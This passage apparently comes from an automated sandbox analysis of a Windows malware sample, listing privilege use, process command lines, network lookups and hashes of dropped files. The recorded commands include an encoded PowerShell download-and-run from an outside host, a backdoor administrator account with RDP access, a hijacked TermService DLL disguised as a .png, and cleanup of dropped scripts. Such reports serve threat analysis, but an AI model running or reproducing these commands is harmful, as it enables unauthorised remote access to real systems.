| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C1D.tmp" "c:\Users\Admin\AppData\Local\Temp\ax243g2c\CSCF44B0B12EDA144EC9791879C166FE881.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3ybcpC4v /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 3ybcpC4v /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 3ybcpC4v /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3ybcpC4v
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 3ybcpC4v
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 3ybcpC4v
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
Files
memory/1660-60-0x0000000041560000-0x000000004180A000-memory.dmp
memory/1660-63-0x0000000041234000-0x0000000041236000-memory.dmp
memory/1660-64-0x0000000041236000-0x0000000041237000-memory.dmp
memory/1660-62-0x0000000041232000-0x0000000041234000-memory.dmp
memory/1660-65-0x0000000041237000-0x0000000041238000-memory.dmp
memory/688-66-0x0000000000000000-mapping.dmp
memory/688-67-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp
memory/688-68-0x0000000002400000-0x0000000002401000-memory.dmp
memory/688-69-0x000000001AC80000-0x000000001AC81000-memory.dmp
memory/688-70-0x000000001AC00000-0x000000001AC02000-memory.dmp
memory/688-71-0x000000001AC04000-0x000000001AC06000-memory.dmp
memory/688-72-0x0000000002440000-0x0000000002441000-memory.dmp
memory/688-73-0x0000000002500000-0x0000000002501000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/688-75-0x000000001B850000-0x000000001B851000-memory.dmp
memory/900-76-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.cmdline
| MD5 | 10c90815018c53533ad72acf995caf57 |
| SHA1 | bc4490bc1647955132a59d51aec5ac4600f35722 |
| SHA256 | d339ded9ad02ecaa1773f177c96ec91d63b28927cbe19bb005803190d3556938 |
| SHA512 | 10002de0b2dd9840af63fd3c7e5915cef8628e9c9a81c749c1d84d1684f161c567471d819fd2868eaad0e6bc19d4733037cd37c55198d1f5a0a5b62f51331eba |
\??\c:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/664-79-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ax243g2c\CSCF44B0B12EDA144EC9791879C166FE881.TMP
| MD5 | ddfda59f555ca7b662250a1e564865eb |
| SHA1 | ab2a1fc13ad69390a27655f5e8554c97ba80cd6e |
| SHA256 | 2a892f84f57113dd6bd415277d0ca67206ada2579993d59fc45f6e55cdcb2301 |
| SHA512 | 545ef75525b459ee38308df256b3b7a56c5dbdb6219b2d4f42cb7e5fe1b6a94f16ee0ae8f398e026d83e52d2e77c62af5533dd65c69493fc287f1410cb8c8c3b |
C:\Users\Admin\AppData\Local\Temp\RES4C1D.tmp
| MD5 | a9630b1e4888d9578e687e6cf93bff25 |
| SHA1 | 0ba95823ca4d2f4af40317c14448cbd2f59e6e0f |
| SHA256 | 43301466c105903e4fbbd43969189ab1645ea42754ca5f673084a074dc49fe57 |
| SHA512 | 9e13401565b1631c3cd7672df49a70f23c9f2d9212bfd89e3ab747c40cfc6a2e7d8897159541eda89daf8a4a695a9e8835054bc0cab3200bf79f7b1394ea13f9 |
memory/688-83-0x0000000002470000-0x0000000002471000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ax243g2c\ax243g2c.dll
| MD5 | 6e8b670d36f0a8e688cc3c44850f1742 |
| SHA1 | 81d206954e9f9d16009e3eb35d219e9c58c0eaf4 |
| SHA256 | 4aaf6394105485f912c219bdf8a0128025a6521e2699184d62fc2ce5e108e402 |
| SHA512 | 61b4f12087184f35eece4ecffc4bf1a9c08ad3581b19b8e827ab764cfaf48326a2952beae9517b4c500ee7a32d307ef6ed6e0d41dc569ca73231d0a0641fce19 |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/688-85-0x000000001C4B0000-0x000000001C4B1000-memory.dmp
memory/688-86-0x000000001C530000-0x000000001C531000-memory.dmp
memory/688-87-0x00000000026F0000-0x00000000026F1000-memory.dmp
memory/620-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6c702b6817a23dc16c269caf6c004c27 |
| SHA1 | ada596f551643a76bb6a9b7835e4ee6fae56579d |
| SHA256 | ba0c315f9be1d48ad1b41bfffa8e006286c96fb18eec8d34fc5a06eefaaeb7f7 |
| SHA512 | 7098703839e37f5cdcbf642bbb883e4a60cc4c5079104f53b46ad5dda7222c2daee7822aa812cdc485eb6272361300d590ff0fcac2f9221b4730cd0a2a8c7c9e |
memory/620-93-0x000000001AB10000-0x000000001AB12000-memory.dmp
memory/620-94-0x000000001AB14000-0x000000001AB16000-memory.dmp
memory/620-96-0x0000000002490000-0x0000000002491000-memory.dmp
memory/620-98-0x000000001AA80000-0x000000001AA81000-memory.dmp
memory/620-100-0x000000001B500000-0x000000001B501000-memory.dmp
memory/620-101-0x0000000002320000-0x0000000002321000-memory.dmp
memory/688-102-0x000000001AC0A000-0x000000001AC29000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 8d0b889032668fe95ff82c113598b48a |
| SHA1 | 3843e6b889a3fcfb5cb2f376fb0e9a4f1e19f7e4 |
| SHA256 | 6b71f3673fae5a4e32778a803218eba6be52e8abd0787a8f598901782ad9a94a |
| SHA512 | ef7a28f3d49a904aecef86b7b2a3d19dd79d8c2424dc25dc5d77f261c52222abbb3d1b00d6d80426b22fefa4e63b4cc90b9e94f3ab780648015ddc2c892de49c |
memory/620-107-0x00000000027B0000-0x00000000027B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_500f7fb7-43e4-458a-8ec7-ebb2718d02c8
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/620-120-0x000000001B600000-0x000000001B601000-memory.dmp
memory/620-121-0x000000001B650000-0x000000001B651000-memory.dmp
memory/1644-122-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6c702b6817a23dc16c269caf6c004c27 |
| SHA1 | ada596f551643a76bb6a9b7835e4ee6fae56579d |
| SHA256 | ba0c315f9be1d48ad1b41bfffa8e006286c96fb18eec8d34fc5a06eefaaeb7f7 |
| SHA512 | 7098703839e37f5cdcbf642bbb883e4a60cc4c5079104f53b46ad5dda7222c2daee7822aa812cdc485eb6272361300d590ff0fcac2f9221b4730cd0a2a8c7c9e |
memory/1644-128-0x000000001AB50000-0x000000001AB52000-memory.dmp
memory/1644-129-0x000000001AB54000-0x000000001AB56000-memory.dmp
memory/1644-130-0x0000000002580000-0x0000000002581000-memory.dmp
memory/1644-132-0x000000001B6F0000-0x000000001B6F1000-memory.dmp
memory/1644-134-0x0000000002650000-0x0000000002651000-memory.dmp
memory/1644-135-0x0000000002270000-0x0000000002271000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 623b241c8d3545ed375a4c3aea3dcfb1 |
| SHA1 | 03d87ac9a2e68757440246cdf44ba972a45364b0 |
| SHA256 | 3bc3ff1e1023c5c17522b9d7ac9b6e90ff80818f2ac83c5226cfc2436fe92bf0 |
| SHA512 | 41c62e3653f2914567fec7de08a733782c5022efd2defec5744dd9e7ec542fb74fa6ab31d475b27f023107ff35b55f4d264dbfc0ce511357a05210232ebeca80 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0bd867fe-ac26-484c-bd8d-cc45a7259d5d
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f94c0498-03d8-4950-9bed-3f07909c50cf
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_71466070-c7f3-43bd-9dab-0ecdc6e40f09
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a32fc2b7-d86f-42d5-85ba-df2eb2b6c251
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a5f1357-d58c-4ebe-a68e-1f073e1d5d7c
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9b474b06-45ad-4408-b468-0cfcef08bb2a
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
memory/1568-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6c702b6817a23dc16c269caf6c004c27 |
| SHA1 | ada596f551643a76bb6a9b7835e4ee6fae56579d |
| SHA256 | ba0c315f9be1d48ad1b41bfffa8e006286c96fb18eec8d34fc5a06eefaaeb7f7 |
| SHA512 | 7098703839e37f5cdcbf642bbb883e4a60cc4c5079104f53b46ad5dda7222c2daee7822aa812cdc485eb6272361300d590ff0fcac2f9221b4730cd0a2a8c7c9e |
memory/1568-149-0x000000001AA40000-0x000000001AA42000-memory.dmp
memory/1568-150-0x000000001AA44000-0x000000001AA46000-memory.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/688-158-0x000000001C640000-0x000000001C641000-memory.dmp
memory/384-159-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/1584-161-0x0000000000000000-mapping.dmp
memory/272-162-0x0000000000000000-mapping.dmp
memory/1356-163-0x0000000000000000-mapping.dmp
memory/1732-164-0x0000000000000000-mapping.dmp
memory/1728-165-0x0000000000000000-mapping.dmp
memory/1724-166-0x0000000000000000-mapping.dmp
memory/588-167-0x0000000000000000-mapping.dmp
memory/1128-168-0x0000000000000000-mapping.dmp
memory/1972-169-0x0000000000000000-mapping.dmp
memory/676-170-0x0000000000000000-mapping.dmp
memory/1640-171-0x0000000000000000-mapping.dmp
memory/2036-172-0x0000000000000000-mapping.dmp
memory/1248-173-0x0000000000000000-mapping.dmp
memory/1176-174-0x0000000000000000-mapping.dmp
memory/2032-175-0x0000000000000000-mapping.dmp
memory/1156-176-0x0000000000000000-mapping.dmp
memory/596-177-0x0000000000000000-mapping.dmp
memory/572-178-0x0000000000000000-mapping.dmp
memory/1568-179-0x0000000000000000-mapping.dmp
memory/1924-180-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/1672-183-0x0000000000000000-mapping.dmp
memory/1728-184-0x0000000000000000-mapping.dmp
memory/340-185-0x0000000000000000-mapping.dmp
memory/620-186-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1900-188-0x0000000000000000-mapping.dmp
memory/1216-189-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/456-191-0x0000000000000000-mapping.dmp
memory/1564-192-0x0000000000000000-mapping.dmp
memory/1988-193-0x0000000000000000-mapping.dmp
memory/1972-194-0x0000000000000000-mapping.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1248-197-0x0000000000000000-mapping.dmp
memory/936-198-0x0000000000000000-mapping.dmp
memory/1672-199-0x0000000000000000-mapping.dmp
memory/1164-200-0x0000000000000000-mapping.dmp
